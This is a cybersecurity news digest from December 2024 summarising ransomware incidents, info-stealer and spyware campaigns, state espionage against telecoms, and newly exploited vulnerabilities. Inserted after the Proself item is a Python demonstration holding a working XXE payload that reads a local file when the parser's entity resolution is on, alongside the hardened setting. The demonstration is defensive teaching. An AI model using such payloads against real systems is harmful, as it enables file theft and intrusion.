    Autosummary: RedLine info-stealer campaign targets Russian businesses through pirated corporate software (Pierluigi Paganini, December 08, 2024). An ongoing RedLine information-stealing campaign is targeting Russian businesses using pirated corporate software.


    Romania Cancels Presidential Election Results After Alleged Russian Meddling on TikTok

    rusia-ucrania
    2024-12-07 https://thehackernews.com/2024/12/romania-cancels-presidential-election.html
    In a historic decision, Romania’s constitutional court has annulled the result of the first round of voting in the presidential election amid allegations of Russian interference. As a result, the second round vote, which was scheduled for December 8, 2024, will no longer take place. Călin Georgescu, who won the first round, denounced the verdict as an "officialized coup" and an attack on

    Autosummary: The European Commission, in a press statement on Thursday, said it has stepped up its monitoring of TikTok, urging the platform to "freeze and preserve data related to actual or foreseeable systemic risks its service could pose on electoral processes and civic discourse in the E.U." To that end, it has been asked to retain internal documents and information regarding the design and functioning of its recommender systems, in addition to details on how it’s addressing the risk of intentional manipulation through a technique called coordinated inauthentic behavior (CIB).


    Russia’s FSB used spyware against a Russian programmer

    rusia-ucrania
    2024-12-07 https://securityaffairs.com/171767/malware/russias-fsb-used-spyware-against-a-russian-programmer.html
    Russia’s FSB used spyware against a Russian programmer after detaining him for allegedly donating to Ukraine earlier this year. The Federal Security Service (FSB) used spyware to monitor a Russian programmer, Kirill Parubets, after he was detained earlier this year for allegedly donating to Ukraine. Researchers from the First Department and the Citizen Lab discovered that the […]

    Autosummary: Moreover, the spyware retains some permissions also found in the genuine app, such as precise location tracking, recording phone calls, and accessing contact information, which are common functionalities in many spyware tools. Its functionality includes location tracking, screen capture, keylogging, call recording, file extraction, password retrieval, and reading messages from other apps.


    Ultralytics AI Library Compromised: Cryptocurrency Miner Found in PyPI Versions

    industry
    2024-12-07 https://thehackernews.com/2024/12/ultralytics-ai-library-compromised.html
    In yet another software supply chain attack, it has come to light that two versions of a popular Python artificial intelligence (AI) library named ultralytics were compromised to deliver a cryptocurrency miner. The versions, 8.3.41 and 8.3.42, have since been removed from the Python Package Index (PyPI) repository. A subsequently released version has introduced a security fix that "ensures


    Anna Jaques Hospital ransomware breach exposed data of 300K patients

    exploits ransomware
    2024-12-07 https://www.bleepingcomputer.com/news/security/anna-jaques-hospital-ransomware-breach-exposed-data-of-300k-patients/
    Anna Jaques Hospital has confirmed on its website that a ransomware attack it suffered almost precisely a year ago, on December 25, 2023, has exposed sensitive health data for over 316,000 patients. [...]


    8Base ransomware group hacked Croatia’s Port of Rijeka

    exploits ransomware
    2024-12-07 https://securityaffairs.com/171779/cyber-crime/8base-ransomware-croatias-port-of-rijeka.html
    The 8Base ransomware group attacked Croatia’s Port of Rijeka, stealing sensitive data, including contracts and accounting info. A cyber attack hit the Port of Rijeka in Croatia; the 8Base ransomware group claimed responsibility for the security breach. The Port of Rijeka (Luka Rijeka d.d.), Croatia’s largest dry cargo concessionaire, provides maritime traffic services, port operations, […]


    GenAI makes phishing attacks more believable and cost-effective

    financial
    2024-12-06 https://www.helpnetsecurity.com/2024/12/06/genai-phishing-attacks-concerns/

    GenAI is a powerful tool that can be used by security teams to protect organizations; however, it can also be used by malicious actors, making phishing-related attacks a growing and concerning threat vector, according to Ivanti. Ivanti’s research revealed that when asked which threats are increasing in severity due to GenAI, phishing was the top response (45%) among survey participants. Although training is a crucial part of a multi-layered cyber defense, many organizations have not … More

    The post GenAI makes phishing attacks more believable and cost-effective appeared first on Help Net Security.


    Hackers Leveraging Cloudflare Tunnels, DNS Fast-Flux to Hide GammaDrop Malware

    exploits
    2024-12-06 https://thehackernews.com/2024/12/hackers-leveraging-cloudflare-tunnels.html
    The threat actor known as Gamaredon has been observed leveraging Cloudflare Tunnels as a tactic to conceal its staging infrastructure hosting a malware called GammaDrop. The activity is part of an ongoing spear-phishing campaign targeting Ukrainian entities since at least early 2024 that’s designed to drop the Visual Basic Script malware, Recorded Future’s Insikt Group said in a new analysis.

    Autosummary:
    - PteroPSLoad, PteroX, PteroSand, PteroDash, PteroRisk, and PteroPowder - Download payloads
    - PteroCDrop - Drop Visual Basic Script payloads
    - PteroClone - Deliver payloads using the rclone utility
    - PteroLNK - Weaponize connected USB drives
    - PteroDig - Weaponize LNK files in the Desktop folder for persistence
    - PteroSocks - Provide partial SOCKS proxy functionality
    - PteroPShell, ReVBShell - Function as a remote shell
    - PteroPSDoor, PteroVDoor - Exfiltrate specific files from the file system
    - PteroScreen - Capture and exfiltrate screenshots
    - PteroSteal - Exfiltrate credentials stored by web browsers
    - PteroCookie - Exfiltrate cookies stored by web browsers
    - PteroSig - Exfiltrate data stored by the Signal application
    - PteroGram - Exfiltrate data stored by the Telegram application
    - PteroBleed - Exfiltrate data stored by web versions of Telegram and WhatsApp from Google Chrome, Microsoft Edge, and Opera
    - PteroScout - Exfiltrate system information
    The latest set of attacks highlighted by Recorded Future entails sending phishing emails bearing HTML attachments, which leverage a technique called HTML smuggling to activate the infection process via embedded JavaScript code.


    Windows, macOS users targeted with crypto-and-info-stealing malware

    exploits
    2024-12-06 https://www.helpnetsecurity.com/2024/12/06/information-cryptocurrency-stealing-malware-windows-macos/

    Downloading anything from the internet is a gamble these days: you might think that you are downloading an innocuous app from a legitimate firm but thanks to clever misuse of AI and some social engineering, you can end up with information and cryptocurrency-stealing malware. Case in point: Cado Security Labs researchers have recently reported websites set up to impersonate companies offering a video conferencing app, but serving/pushing the Realst info-stealer. Preparing and executing the scam … More

    The post Windows, macOS users targeted with crypto-and-info-stealing malware appeared first on Help Net Security.

    Autosummary: The malware looks to steal Telegram credentials; keychain credentials; browser cookies and credentials stored in Chrome, Opera, Brave, Edge, Arc, CocCoc and Vivaldi browsers; Ledger, Trezor, Phantom and Binance wallets; and banking card details.


    Blue Yonder SaaS giant breached by Termite ransomware gang

    exploits ransomware
    2024-12-06 https://www.bleepingcomputer.com/news/security/blue-yonder-saas-giant-breached-by-termite-ransomware-gang/
    The Termite ransomware gang has officially claimed responsibility for the November breach of software as a service (SaaS) provider Blue Yonder. [...]

    Autosummary: Its list of over 3,000 customers includes other high-profile companies like Microsoft, Renault, Bayer, Tesco, Lenovo, DHL, 3M, Ace Hardware, Procter & Gamble, Carlsberg, Dole, Walgreens, Western Digital, and 7-Eleven.


    New Windows zero-day exposes NTLM credentials, gets unofficial patch

    exploits
    2024-12-06 https://www.bleepingcomputer.com/news/security/new-windows-zero-day-exposes-ntlm-credentials-gets-unofficial-patch/
    A new zero-day vulnerability has been discovered that allows attackers to capture NTLM credentials by simply tricking the target into viewing a malicious file in Windows Explorer. [...]

    Autosummary: 0patch says that other NTLM hash disclosure flaws disclosed in the past, like PetitPotam, PrinterBug/SpoolSample, and DFSCoerce, all remain without an official fix on the latest Windows versions, leaving users with only the 0patch-provided micropatches.


    Crypto-stealing malware posing as a meeting app targets Web3 pros

    exploits
    2024-12-06 https://www.bleepingcomputer.com/news/security/crypto-stealing-malware-posing-as-a-meeting-app-targets-web3-pros/
    Cybercriminals are targeting people working in Web3 with fake business meetings using a fraudulent video conferencing platform that infects Windows and Macs with crypto-stealing malware. [...]

    Autosummary: [Figure: System info collected by the malware. Source: Cado] The Rust-based executable attempts to collect the following information, add it to a ZIP file, and exfiltrate it:
    - Telegram credentials
    - Banking card details
    - Browser cookies, history, and autofill credentials from Google Chrome, Opera, Brave, Microsoft Edge, Arc, CocCoc, and Vivaldi
    - Ledger, Trezor, Phantom, and Binance wallets
    Compared to macOS, the Windows version features a more elaborate and versatile payload delivery mechanism, better evasion, and the ability to persist between reboots through registry modification.


    FSB Uses Trojan App to Monitor Russian Programmer Accused of Supporting Ukraine

    exploits rusia-ucrania
    2024-12-06 https://thehackernews.com/2024/12/fsb-uses-trojan-app-to-monitor-russian.html
    A Russian programmer accused of donating money to Ukraine had his Android device secretly implanted with spyware by the Federal Security Service (FSB) after he was detained earlier this year. The findings come as part of a collaborative investigation by First Department and the University of Toronto’s Citizen Lab. "The spyware placed on his device allows the operator to track a target device’s

    Autosummary: The second stage incorporates features to log keystrokes, extract files and stored passwords, read chats from other messaging apps, inject JavaScript, execute shell commands, obtain the device unlock password, and even add a new device administrator.


    Ultralytics AI model hijacked to infect thousands with cryptominer

    industry
    2024-12-06 https://www.bleepingcomputer.com/news/security/ultralytics-ai-model-hijacked-to-infect-thousands-with-cryptominer/
    The popular Ultralytics YOLO11 AI model was compromised in a supply chain attack to deploy cryptominers on devices running versions 8.3.41 and 8.3.42 from the Python Package Index (PyPI) [...]

    Autosummary: [Figure: Comment by Glenn Jocher on GitHub. Source: BleepingComputer] The developers are currently investigating the root cause and potential vulnerabilities in the Ultralytics build environment to determine how it was breached.


    New Atrium Health data breach impacts 585,000 individuals

    financial
    2024-12-06 https://securityaffairs.com/171747/data-breach/atrium-health-disclosed-a-data-breach.html
    Atrium Health disclosed a data breach affecting 585,000 individuals to the HHS, potentially linked to the use of online tracking tools. Healthcare company Atrium Health disclosed a data breach that impacted 585,000 individuals. The company notified the US Department of Health and Human Services (HHS). Atrium Health launched an investigation into the security breach and […]

    Autosummary: Additionally, if users filled out forms, data such as name, email, phone number, address, and gender may have been shared with third-party vendors.


    U.S. CISA adds CyberPanel flaw to its Known Exploited Vulnerabilities catalog

    exploits
    2024-12-06 https://securityaffairs.com/171736/hacking/u-s-cisa-adds-cyberpanel-flaw-known-exploited-vulnerabilities-catalog.html
    U.S. Cybersecurity and Infrastructure Security Agency (CISA) adds CyberPanel flaw to its Known Exploited Vulnerabilities catalog. The U.S. Cybersecurity and Infrastructure Security Agency (CISA) added the CyberPanel flaw CVE-2024-51378 (CVSS score: 10.0) to its Known Exploited Vulnerabilities (KEV) catalog. The getresetstatus vulnerability in CyberPanel (before commit 1c0c6cb) affects dns/views.py and ftp/views.py. Remote attackers could bypass authentication and execute […]

    Autosummary: “getresetstatus in dns/views.py and ftp/views.py in CyberPanel (aka Cyber Panel) before 1c0c6cb allows remote attackers to bypass authentication and execute arbitrary commands via /dns/getresetstatus or /ftp/getresetstatus by bypassing secMiddleware (which is only for a POST request) and using shell metacharacters in the statusfile property, as exploited in the wild in October 2024 by PSAUX.” reads the advisory.


    NCA Busts Russian Crypto Networks Laundering Funds and Evading Sanctions

    rusia-ucrania
    2024-12-05 https://thehackernews.com/2024/12/nca-busts-russian-crypto-networks.html
    The U.K. National Crime Agency (NCA) on Wednesday announced that it led an international investigation to disrupt Russian money laundering networks that were found to facilitate serious and organized crime across the U.K., the Middle East, Russia, and South America. The effort, codenamed Operation Destabilise, has resulted in the arrest of 84 suspects linked to two Russian-speaking networks

    Autosummary: The TGR Group is said to provide a wide range of illegal financial services, including laundering funds belonging to sanctioned entities, an unregistered service to exchange cash and cryptocurrency, accepting cash receipts and converting them into digital assets for clients, a prepaid credit card service, and concealing the source of funds to allow Russian elites to purchase property in the U.K. The NCA noted that the Smart network was used to fund Russian espionage operations between late 2022 and summer 2023.


    CISA Warns of Active Exploitation of Flaws in Zyxel, ProjectSend, and CyberPanel

    exploits
    2024-12-05 https://thehackernews.com/2024/12/cisa-warns-of-active-exploitation-of.html
    The U.S. Cybersecurity and Infrastructure Security Agency (CISA) added multiple security flaws affecting products from Zyxel, North Grid Proself, ProjectSend, and CyberPanel to its Known Exploited Vulnerabilities (KEV) catalog, citing evidence of active exploitation in the wild. The list of vulnerabilities is as follows - CVE-2024-51378 (CVSS score: 10.0) - An incorrect default permissions

    Autosummary:
    - An incorrect permission assignment for critical resource vulnerability that allows an attacker with guest account access to read sensitive files, including those containing credentials
    - CVE-2024-47133 (CVSS score: 7.2) - An operating system (OS) command injection vulnerability that allows a logged-in user with an administrative account to execute arbitrary commands
    - CVE-2024-52564 (CVSS score: 7.5) -


    Netography introduces AI-powered ransomware detection capabilities

    exploits ransomware
    2024-12-05 https://www.helpnetsecurity.com/2024/12/05/netography-ransomware-detection-capabilities/

    Netography announced new ransomware detection capabilities that enable organizations to respond to malicious activity in real-time before it disrupts operations or threatens business continuity. These AI-powered enhancements enable Fusion customers to close the network observability and security gaps caused by limitations in their existing platform-native and cloud-native tools, including the inability to detect malicious activity and the lack of a holistic view of all network activity. The scope of the ransomware problem continues to grow, … More

    The post Netography introduces AI-powered ransomware detection capabilities appeared first on Help Net Security.

    Autosummary: The Fusion platform also reduces the workload of operations teams by automatically discovering new VPCs or VNet instances (or changes in the behavior of existing instances), applying policies, and monitoring the activity of those instances: Virtual Private Cloud (VPC) and Virtual Network (VNet) Auto-Detection and Auto-Onboarding – Fusion can now automatically detect, apply policies to, and monitor newly discovered VPCs and VNets, eliminating blind spots in security monitoring.


    8 US telcos compromised, FBI advises Americans to use encrypted communications

    Telcos
    2024-12-05 https://www.helpnetsecurity.com/2024/12/05/us-telcos-compromised-fbi-advises-use-of-encrypted-communications/

    FBI and Cybersecurity and Infrastructure Security Agency (CISA) officials have advised Americans to use encrypted call and messaging apps to protect their communications from threat actors that have – and will – burrow into the networks and systems of US telecommunication companies. NBC News reported that the advice was given during a conference call with the media on Tuesday, during which the officials also shared that the compromise of the networks of multiple US telcos … More

    The post 8 US telcos compromised, FBI advises Americans to use encrypted communications appeared first on Help Net Security.


    Hackers Target Uyghurs and Tibetans with MOONSHINE Exploit and DarkNimbus Backdoor

    exploits
    2024-12-05 https://thehackernews.com/2024/12/hackers-target-uyghurs-and-tibetans.html
    A previously undocumented threat activity cluster dubbed Earth Minotaur is leveraging the MOONSHINE exploit kit and an unreported Android-cum-Windows backdoor called DarkNimbus to facilitate long-term surveillance operations targeting Tibetans and Uyghurs. "Earth Minotaur uses MOONSHINE to deliver the DarkNimbus backdoor to Android and Windows devices, targeting WeChat, and possibly making it a

    Autosummary: Countries affected by Earth Minotaur’s attacks span Australia, Belgium, Canada, France, Germany, India, Italy, Japan, Nepal, the Netherlands, Norway, Russia, Spain, Switzerland, Taiwan, Turkey, and the U.S. MOONSHINE first came to light in September 2019 as part of cyber attacks targeting the Tibetan community, with the Citizen Lab attributing its use to an operator it tracks under the moniker POISON CARP, which overlaps with threat groups Earth Empusa and Evil Eye.


    Want to Grow Vulnerability Management into Exposure Management? Start Here!

    exploits
    2024-12-05 https://thehackernews.com/2024/12/want-to-grow-vulnerability-management.html
    Vulnerability Management (VM) has long been a cornerstone of organizational cybersecurity. Nearly as old as the discipline of cybersecurity itself, it aims to help organizations identify and address potential security issues before they become serious problems. Yet, in recent years, the limitations of this approach have become increasingly evident. At its core, Vulnerability Management

    Autosummary: The era of "just" on-prem systems and networks is long gone – today’s attack surface encompasses SaaS platforms, IoT devices, hybrid and remote workforces, complex supply chains, social media, third-party platforms, the dark web, public-facing assets and much, much more. In a recent report, How to Grow Vulnerability Management into Exposure Management (Gartner, How to Grow Vulnerability Management Into Exposure Management, 8 November 2024, Mitchell Schneider Et Al.), we believe Gartner® addresses this point precisely and demonstrates how organizations can – and must – shift from a vulnerability-centric strategy to a broader Exposure Management (EM) framework. Metrics that reflect business-driven insights (such as a reduction of attack surface exposure, a decrease in risk to critical assets, and any operational efficiencies gained) bridge the gap between technical cybersecurity measures and business goals. With Exposure Management, organizations can better address what truly matters: safeguarding our critical assets, minimizing operational disruptions, and aligning our cybersecurity efforts with business priorities.


    Researchers Uncover 4-Month Cyberattack on U.S. Firm Linked to Chinese Hackers

    ciber
    2024-12-05 https://thehackernews.com/2024/12/researchers-uncover-4-month-cyberattack.html
    A suspected Chinese threat actor targeted a large U.S. organization earlier this year as part of a four-month-long intrusion. According to Broadcom-owned Symantec, the first evidence of the malicious activity was detected on April 11, 2024 and continued until August. However, the company doesn’t rule out the possibility that the intrusion may have occurred earlier. "The attackers moved laterally

    Autosummary: Besides using DLL side-loading to execute malicious payloads, the attack entails the use of open-source tools like FileZilla, Impacket, and PSCP, while also employing living-off-the-land (LotL) programs like Windows Management Instrumentation (WMI), PsExec, and PowerShell.


    New Android spyware found on phone seized by Russian FSB

    rusia-ucrania
    2024-12-05 https://www.bleepingcomputer.com/news/security/new-android-spyware-found-on-phone-seized-by-russian-fsb/
    After a Russian programmer was detained by Russia’s Federal Security Service (FSB) for fifteen days and his phone confiscated, it was discovered that a new spyware was secretly installed on his device upon its return. [...]


    Latrodectus malware and how to defend against it with Wazuh

    exploits
    2024-12-05 https://www.bleepingcomputer.com/news/security/latrodectus-malware-and-how-to-defend-against-it-with-wazuh/
    Latrodectus is a versatile malware family that infiltrates systems, steals sensitive data, and evades detection. Learn more from Wazuh about Latrodectus malware and how to defend against it using the open-source XDR. [...]

    Autosummary: Recent samples use a simplified string decryption routine, shifting from a complex pseudo-random number generator (PRNG) to a more efficient XOR-based routine.
    Persistence mechanisms: After infection, Latrodectus replicates itself to a hidden system location, commonly %AppData%, and ensures persistence by creating scheduled tasks like C:\Windows\System32\Tasks\system_update to launch after reboots.
    Environment evasion: Before loading its payload, Latrodectus checks for virtualization environments by examining several system attributes.
    With its real-time monitoring, threat detection, and log analysis capabilities, Wazuh can identify suspicious activities that indicate the presence of Latrodectus malware, such as unusual file modifications, encrypted data, or unauthorized access attempts. In this article, we will explore the nature of Latrodectus malware, how it operates, and, most importantly, how organizations can defend against it. These capabilities include selective data theft, where the malware targets specific data types to exfiltrate, alongside system reconnaissance and, occasionally, ransomware functions.


    Mitel MiCollab zero-day flaw gets proof-of-concept exploit

    exploits
    2024-12-05 https://www.bleepingcomputer.com/news/security/mitel-micollab-zero-day-flaw-gets-proof-of-concept-exploit/
    Researchers have uncovered an arbitrary file read zero-day in the Mitel MiCollab collaboration platform, allowing attackers to access files on a server’s filesystem. [...]

    Autosummary: Mitel MiCollab is an enterprise collaboration platform that consolidates various communication tools into a single application, offering voice and video calling, messaging, presence information, audio conferencing, mobility support, and team collaboration functionalities.


    US arrests Scattered Spider suspect linked to telecom hacks

    Telcos
    2024-12-05 https://www.bleepingcomputer.com/news/security/us-arrests-scattered-spider-suspect-linked-to-telecom-hacks/
    U.S. authorities have arrested a 19-year-old linked to the notorious Scattered Spider cybercrime gang who is now charged with breaching a U.S. financial institution and two unnamed telecommunications firms. [...]

    Autosummary: "Sosa" and "Elijah," of Palm Coast, Florida; Evans Onyeaka Osiebo, 20, of Dallas, Texas; Joel Martin Evans, 25, a.k.a. "joeleoli," of Jacksonville, North Carolina; Tyler Robert Buchanan, 22, of the United Kingdom.


    Americans urged to use encrypted messaging after large, ongoing cyberattack

    ciber
    2024-12-05 https://www.malwarebytes.com/blog/news/2024/12/americans-urged-to-use-encrypted-messaging-after-large-ongoing-cyberattack
    US telecom providers have been infiltrated to a worrying level by an APT group. The advice is to use encrypted messaging.

    Autosummary: The FBI official added: “People looking to further protect their mobile device communications would benefit from considering using a cellphone that automatically receives timely operating system updates, responsibly managed encryption and phishing resistant multi-factor authentication for email, social media, and collaboration tool accounts.”


    Russian money-laundering network linked to drugs and ransomware disrupted, 84 arrests

    financial exploits ransomware rusia-ucrania
    2024-12-05 https://www.tripwire.com/state-of-security/money-laundering-network-linked-drugs-and-ransomware-disrupted
    The UK’s National Crime Agency (NCA) has revealed details of Operation Destabilise, a years-long international law enforcement investigation into a giant Russian money laundering enterprise that handled billions of dollars for drug traffickers and ransomware gangs worldwide. Read more in my article on the Tripwire State of Security blog.

    Autosummary: Led by the National Crime Agency working with Border Force, Op Destabilise has exposed Russian kleptocrats, drug gangs, and cyber criminals - all of whom relied on the flow of dirty money," said Security Minister Dan Jarvis.


    Mitel MiCollab zero-day and PoC exploit unveiled

    exploits
    2024-12-05 https://www.helpnetsecurity.com/2024/12/05/mitel-micollab-zero-day-and-poc-exploit-unveiled/

    A zero-day vulnerability in the Mitel MiCollab enterprise collaboration suite can be exploited to read files containing sensitive data, watchTowr researcher Sonny Macdonald has disclosed, and followed up by releasing a proof-of-concept (PoC) exploit that chains together this zero-day file read vulnerability with CVE-2024-41713, which allows attackers to bypass authentication. A zero-day and PoC to grab sensitive info of MiCollab users In a blog post published on Thursday, Macdonald tells of watchTowr’s quest to reproduce … More

    The post Mitel MiCollab zero-day and PoC exploit unveiled appeared first on Help Net Security.


    This $3,000 Android Trojan Targeting Banks and Cryptocurrency Exchanges

    financial exploits
    2024-12-05 https://thehackernews.com/2024/12/this-3000-android-trojan-targeting.html
    As many as 77 banking institutions, cryptocurrency exchanges, and national organizations have become the target of a newly discovered Android remote access trojan (RAT) called DroidBot. "DroidBot is a modern RAT that combines hidden VNC and overlay attack techniques with spyware-like capabilities, such as keylogging and user interface monitoring," Cleafy researchers Simone Mattia, Alessandro

    Autosummary: Campaigns leveraging DroidBot have been primarily observed in Austria, Belgium, France, Italy, Portugal, Spain, Turkey, and the United Kingdom.


    Romania’s election systems targeted in over 85,000 cyberattacks

    ciber
    2024-12-05 https://www.bleepingcomputer.com/news/security/romanias-election-systems-targeted-in-over-85-000-cyberattacks/
    A declassified report from Romania’s Intelligence Service says that the country’s election infrastructure was targeted by more than 85,000 cyberattacks. [...]

    Autosummary: Following this incident, account credentials for Romanian election sites, including bec.ro (Central Election Bureau), roaep.ro, and registrulelectoral.ro (voter registration), were leaked on a Russian cybercrime forum.


    Operation Destabilise dismantled Russian money laundering networks

    financial rusia-ucrania
    2024-12-05 https://securityaffairs.com/171710/cyber-crime/operation-destabilise-anti-money-laundering.html
    Operation Destabilise: The U.K. National Crime Agency disrupted Russian money laundering networks tied to organized crime. The U.K. National Crime Agency (NCA) disrupted Russian money laundering networks linked to organized crime across the U.K., Middle East, Russia, and South America as part of an operation called “Operation Destabilise.” “An international NCA-led investigation – Operation Destabilise […] "

    Autosummary: “Through the TGR Group, Russian elites sought to exploit digital assets—in particular U.S. dollar-backed stablecoins—to evade U.S. and international sanctions, further enriching themselves and the Kremlin,” said Acting Under Secretary for Terrorism and Financial Intelligence Bradley T. Smith, “The United States, alongside our allies and partners, remains committed to disrupting any effort by Russia to use digital assets or other illicit financial schemes to accrue, store, and transfer their ill-gotten gains.” “Through key facilitators like Zhdanova, Russian elites, ransomware groups, and other illicit actors sought to evade U.S. and international sanctions, particularly through the abuse of virtual currency,” said Under Secretary of the Treasury for Terrorism and Financial Intelligence Brian E. Nelson. "


    China-linked APT Salt Typhoon has breached telcos in dozens of countries

    Telcos
    2024-12-05 https://securityaffairs.com/171692/apt/china-salt-typhoon-breached-telecommunications.html
    China-linked APT group Salt Typhoon has breached telecommunications companies in dozens of countries, US govt warns. President Biden’s deputy national security adviser Anne Neuberger said that China-linked APT group Salt Typhoon has breached telecommunications companies in dozens of countries. The Wall Street Journal reported that the senior White House official revealed that at least eight […] "

Autosummary: In September, the Wall Street Journal reported that China-linked APT group Salt Typhoon (also known as FamousSparrow and GhostEmperor) breached U.S. broadband providers, including Verizon, AT&T, and Lumen Technologies, potentially accessing systems for lawful wiretapping and other data. China-linked APT Salt Typhoon has breached telcos in dozens of countries (Pierluigi Paganini, December 05, 2024): China-linked APT group Salt Typhoon has breached telecommunications companies in dozens of countries, US govt warns. “Specifically, we have identified that PRC-affiliated actors have compromised networks at multiple telecommunications companies to enable the theft of customer call records data, the compromise of private communications of a limited number of individuals who are primarily involved in government or political activity, and the copying of certain information that was subject to U.S. law enforcement requests pursuant to court orders. "


    Trump tariff threat puts a strain on Canada-Mexico ties

    latam
    2024-12-05 https://www.bbc.com/news/articles/ce3lznerryqo
    Canadian officials have suggested striking their own trade agreements with the US - and Mexico has taken notice. "

Autosummary: Sheinbaum's remarks came after Canada's US ambassador, Kirsten Hillman, told the news agency that during a recent dinner at Mar-a-Lago, Trump's Florida residence, Prime Minister Justin Trudeau told the president-elect that the northern border was "vastly different than the Mexican border". "


    65% of office workers bypass cybersecurity to boost productivity

    ciber
    2024-12-04 https://www.helpnetsecurity.com/2024/12/04/employees-privileged-access-security-risk/

    High-risk access exists throughout the workplace, in almost every job role, proving that the time has come for organizations to re-think the way they protect their workforce, according to CyberArk. CyberArk surveyed 14,003 employees in the UK, USA, France, Germany, Australia and Singapore to uncover workforce behaviors that security teams are most keen to put a stop to. Employees depend on privileged access to complete daily tasks These days, almost all employees have some kind … More

    The post 65% of office workers bypass cybersecurity to boost productivity appeared first on Help Net Security.

    "

    Autosummary: CyberArk found that all employees surveyed access work applications and services from their corporate device, including access communications and collaboration tools e.g. Teams, Slack, Outlook (52%), IT admin and management tools (41%) and customer-facing apps (34%). "


    Veeam Issues Patch for Critical RCE Vulnerability in Service Provider Console

    exploits Telcos
    2024-12-04 https://thehackernews.com/2024/12/veeam-issues-patch-for-critical-rce.html
    Veeam has released security updates to address a critical flaw impacting Service Provider Console (VSPC) that could pave the way for remote code execution on susceptible instances. The vulnerability, tracked as CVE-2024-42448, carries a CVSS score of 9.9 out of a maximum of 10.0. The company noted that the bug was identified during internal testing. "From the VSPC management agent machine, under "

    Autosummary: "


    Critical SailPoint IdentityIQ Vulnerability Exposes Files to Unauthorized Access

    exploits
    2024-12-04 https://thehackernews.com/2024/12/critical-sailpoint-identityiq.html
A critical security vulnerability has been disclosed in SailPoint's IdentityIQ identity and access management (IAM) software that allows unauthorized access to content stored within the application directory. The flaw, tracked as CVE-2024-10905, has a CVSS score of 10.0, indicating maximum severity. It affects IdentityIQ versions 8.2, 8.3, 8.4, and earlier versions. IdentityIQ "allows "

    Autosummary: "


    Joint Advisory Warns of PRC-Backed Cyber Espionage Targeting Telecom Networks

    Telcos
    2024-12-04 https://thehackernews.com/2024/12/joint-advisory-warns-of-prc-backed.html
A joint advisory issued by Australia, Canada, New Zealand, and the U.S. has warned of a broad cyber espionage campaign undertaken by People's Republic of China (PRC)-affiliated threat actors targeting telecommunications providers. "Identified exploitations or compromises associated with these threat actors' activity align with existing weaknesses associated with victim infrastructure; no novel "

    Autosummary: "


    U.S. CISA adds ProjectSend, North Grid Proself, and Zyxel firewalls bugs to its Known Exploited Vulnerabilities catalog

    exploits
    2024-12-04 https://securityaffairs.com/171638/security/u-s-cisa-adds-projectsend-north-grid-proself-and-zyxel-firewalls-bugs-to-its-known-exploited-vulnerabilities-catalog.html
    U.S. Cybersecurity and Infrastructure Security Agency (CISA) adds ProjectSend, North Grid Proself, and Zyxel firewalls bugs to its Known Exploited Vulnerabilities catalog. The U.S. Cybersecurity and Infrastructure Security Agency (CISA) added the following vulnerabilities to its Known Exploited Vulnerabilities (KEV) catalog: Proself versions before Ver5.62, Ver1.65, and Ver1.08 are vulnerable to XXE attacks, allowing unauthenticated attackers […] "

Autosummary: U.S. CISA adds ProjectSend, North Grid Proself, and Zyxel firewalls bugs to its Known Exploited Vulnerabilities catalog (Pierluigi Paganini, December 04, 2024): U.S. Cybersecurity and Infrastructure Security Agency (CISA) adds ProjectSend, North Grid Proself, and Zyxel firewalls bugs to its Known Exploited Vulnerabilities catalog. "
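The Proself entry above is an XXE (XML External Entity) bug: an unauthenticated request carrying a DOCTYPE with an external entity makes the server's XML parser read a local file and echo its contents. The following is an added example, not code from the CISA advisory, from Proself or from ProjectSend, and it does not reproduce the Proself bug itself (no request details for it appear on this page). It shows the mechanism with Python's standard-library SAX parser: the same payload is parsed once with external general entities enabled, which is the vulnerable configuration, and once with the default, which refuses to resolve them. The "secret" file, its contents and the document structure are constructed for the demonstration.

```python
"""XXE demonstration with Python's standard-library SAX parser.

Added example (not code from the CISA advisory, Proself or ProjectSend).
The same document is parsed twice: once with external general entities
enabled (the vulnerable configuration) and once with the default, which
refuses to resolve them. The "secret" file is a temporary file created
here solely for the demonstration.
"""
import io
import os
import tempfile
import xml.sax
import xml.sax.handler


class TextCollector(xml.sax.handler.ContentHandler):
    """Accumulate character data so we can see what the parser expanded."""

    def __init__(self):
        super().__init__()
        self.parts = []

    def characters(self, content):
        self.parts.append(content)

    def text(self):
        return "".join(self.parts)


def build_xxe_document(path):
    """Classic XXE payload: an external general entity pointing at a local file."""
    return (
        '<?xml version="1.0"?>\n'
        '<!DOCTYPE upload [\n'
        f'  <!ENTITY xxe SYSTEM "{path}">\n'
        ']>\n'
        '<upload><name>&xxe;</name></upload>\n'
    ).encode()


def extract_text(xml_bytes, allow_external_entities):
    """Parse the document and return its character data.

    allow_external_entities=True reproduces the vulnerable setting
    (feature_external_ges switched on); False is the hardened default
    that CPython has shipped since 3.7.1. The check to make in code
    review is that nobody turns the feature on.
    """
    parser = xml.sax.make_parser()
    parser.setFeature(xml.sax.handler.feature_external_ges, allow_external_entities)
    collector = TextCollector()
    parser.setContentHandler(collector)
    parser.parse(io.BytesIO(xml_bytes))
    return collector.text()


def xxe_demo():
    """Return (vulnerable_output, hardened_output) for the same payload."""
    with tempfile.NamedTemporaryFile("w", suffix=".txt", delete=False) as f:
        f.write("secret-token-1234\n")  # constructed stand-in for /etc/passwd
        secret_path = f.name
    try:
        doc = build_xxe_document(secret_path)
        vulnerable = extract_text(doc, allow_external_entities=True)
        hardened = extract_text(doc, allow_external_entities=False)
    finally:
        os.unlink(secret_path)
    return vulnerable, hardened


if __name__ == "__main__":
    vuln, safe = xxe_demo()
    print("external entities enabled :", repr(vuln.strip()))
    print("external entities disabled:", repr(safe.strip()))
```

With the feature on, the `<name>` element's text becomes the file's contents; with it off, the entity reference expands to nothing and the file is never opened. Other parsers expose the same switch under different names (for lxml it is `XMLParser(resolve_entities=False)`); whichever library an upload or API endpoint uses, the fix for this class of bug is to disable DTD entity resolution before parsing untrusted XML.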


    Tech support scams leverage Google ads again and again, fleecing unsuspecting internet users

    financial
    2024-12-04 https://www.tripwire.com/state-of-security/tech-support-scams-exploit-google-ads-target-users
It's not a new technique, but that doesn't mean that cybercriminals cannot make rich rewards from SEO poisoning. Read more in my article on the Tripwire State of Security blog. "

    Autosummary: And, according to Jérôme Segura, senior director of research at security firm Malwarebytes, the most common type of malicious Google search ads encountered are those which pose as the customer support teams of major internet brands like PayPal, eBay, Apple, and Netflix. "


    PoC exploit for critical WhatsUp Gold RCE vulnerability released (CVE-2024-8785)

    exploits
    2024-12-04 https://www.helpnetsecurity.com/2024/12/04/poc-exploit-cve-2024-8785-whatsup-gold/

